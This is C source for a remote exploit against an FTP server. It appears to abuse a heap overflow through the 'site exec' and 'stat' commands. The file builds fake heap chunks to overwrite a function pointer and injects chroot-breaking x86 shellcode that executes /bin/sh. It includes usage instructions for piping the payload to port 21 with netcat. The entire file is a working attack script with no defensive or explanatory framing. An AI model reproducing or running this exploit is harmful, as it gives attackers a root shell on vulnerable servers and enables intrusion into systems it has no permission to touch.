// this is the address the brute forcer will find.
int bufaddr2= 0x08097668;
// replace this line with the one it returns to hardcode the offset.
// then start with (./woot-exploit;cat)|nc localhost 21



char sc[]= //chroot breaking shellcode
"\x55\x89\xe5\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\xb0\x2e\xcd\x80"
"\xeb\x43"             // jump end:
//start:
"\x5e\xb0\x27\x8d\x5e\x09\xb1\xed\xcd\x80" // mkdir 
"\x31\xc9\x31\xc0\xb0\x3d\xcd\x80"          // chroot  
"\xba\x2e\x2e\x2f\xff\x8d\x5d\x04\xb1\x10\x89\x55\x04\x83\xc5\x03\xe0\xf8"
"\x89\x4d\x04"                 // constructing ../../../../../../../../../../
"\xb0\x3d\xcd\x80"             // chroot "../../../../../../../../../.."
"\x89\xf3\x89\x75\x08\x89\x4d\x0c\xb0\x0b"
"\x8d\x4d\x08\x8d\x55\x0c\xcd\x80" // execve 
"\x31\xc0\xb0\x01\xcd\x80" // die nicely? 
//end:
"\xe8\xb8\xff\xff\xff"; // call start.

int bufaddr;  // sbrk_base

dosend(unsigned char *p)
{
 while(*p)
 {
  if(*p==0xff) putchar(*p);
  putchar(*p);
  p++;
 }
}

usage()
{
 printf("./woot-exploit gotaddr inpbuf heapaddr {real | scan | slow}\n");
 exit(1);
}


main(int argc,char *argv[])
{
 char buf[1024];  // password
 char buf2[4096]; // everything else
 char snd[8192];
 int l,r;
 int z5=0,v5;     // address of chunk
 int z2=0,v2;     // address of shellcode
 int z3=0,v3;     // address to overwrite bit
 char *t;

 if(argc<5)usage();
 v2=strtoul(argv[2],0,0)+20;
 v3=strtoul(argv[1],0,0)-12;
 v5=strtoul(argv[3],0,0);
 
 memset(buf,0,1024);
 memset(buf2,0,4096);

 if(!strcmp(argv[4],"slow"))
 {
  sleep(1);
  system("ps -aux|grep ftpd >&2");
  sleep(5);
 }

 // setup the password string
 strcpy(buf,"http://mp3.com/cosv     ");
 strcat(buf,&v5); 

 // initialize the message buffer with nops.
 memset(buf2,0x90,480);
 // this hass worked before. *shrug* prolly useless though.
 // *(long*)&buf2[24]=v5;

 // fill the buffer with chunks. overwrites the syslog call pointer with
 // address of our shellcode. 
 for(l=0;l<460;l+=16)
 {
  *(long*)&buf2[l+ 0]=0xfffffff0;
  *(long*)&buf2[l+ 4]=0xfffffff0;
  *(long*)&buf2[l+ 8]=v3; 
  *(long*)&buf2[l+12]=v2;
 }

 // log in. an extremely essential part of the exploit.
 sprintf(snd,"user ftp\npass %s\n",buf); 
 dosend(snd); 

 // expand the heap a little, and put our special chunks on it 
 // the expansion allows passing a check in malloc.c which otherwise
 // seg faults it. multiple chunks allow for bruteforcing approach.
 // did have shellcode here, but this allows more use of the buffer
 // for control chunks.
 sprintf(snd,"site exec %s AAAA\n",buf2);
 dosend(snd); 

 // put shellcode into buffer. 
 // need jmp at landing place because of unlink() garbaging of shellcode...
 // don't need so many jumps, but it makes a pretty pattern... ;]
 memset(buf2,0x90,480);
 for(l=2;l<(440-strlen(sc));l+=6){buf2[l]=0xeb;buf2[l+1]=0x18;}
 buf2[479-strlen(sc)]=0;
 strcat(buf2,sc);
 if(strcmp(argv[4],"real"))strcat(buf2,"/sbin/route"); // if not "real"
 else                      strcat(buf2,"/bin/////sh"); // if     "real"

 // put the shellcode in the input buffer.
 sprintf(snd,"         %s",buf2);
 dosend(snd); 
 // and null terminate it. 
 putchar(0); 
 putchar('\n');

 // fire magic command to server to make it bow to our will.
 sprintf(snd,"stat ~{\n");
 dosend(snd); 
 // leave, shamefully in failure if it doesn't work.
 sprintf(snd,"quit\n");
 dosend(snd); 
 fflush(0);
}